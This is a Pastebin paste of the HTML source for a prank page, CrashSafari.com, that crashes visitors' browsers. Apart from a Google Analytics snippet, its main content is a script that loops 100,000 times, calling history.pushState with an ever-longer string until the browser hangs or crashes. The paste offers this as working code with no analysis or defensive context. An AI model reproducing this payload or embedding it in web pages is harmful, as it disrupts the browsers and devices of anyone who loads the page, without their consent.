Advertisement
Guest User

CrashSafari.com source code

a guest
Jan 25th, 2016
279
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 5 0.92 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html>
  3.     <body>
  4.         <h1>What were you expecting?</h1>
  5.         <script>
  6.             (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  7.                     (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  8.                     m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  9.                     })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  10.  
  11.                     ga('create', 'UA-60737367-1', 'auto');
  12.                     ga('send', 'pageview');
  13.                 </script>
  14.                 <script>
  15.                     var total = "";
  16.                     for( var i = 0; i < 100000; i++ ) {
  17.                        total = total + i.toString();
  18.                        history.pushState(0,0, total );
  19.                    }
  20.                </script>
  21.             </body>
  22.         </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement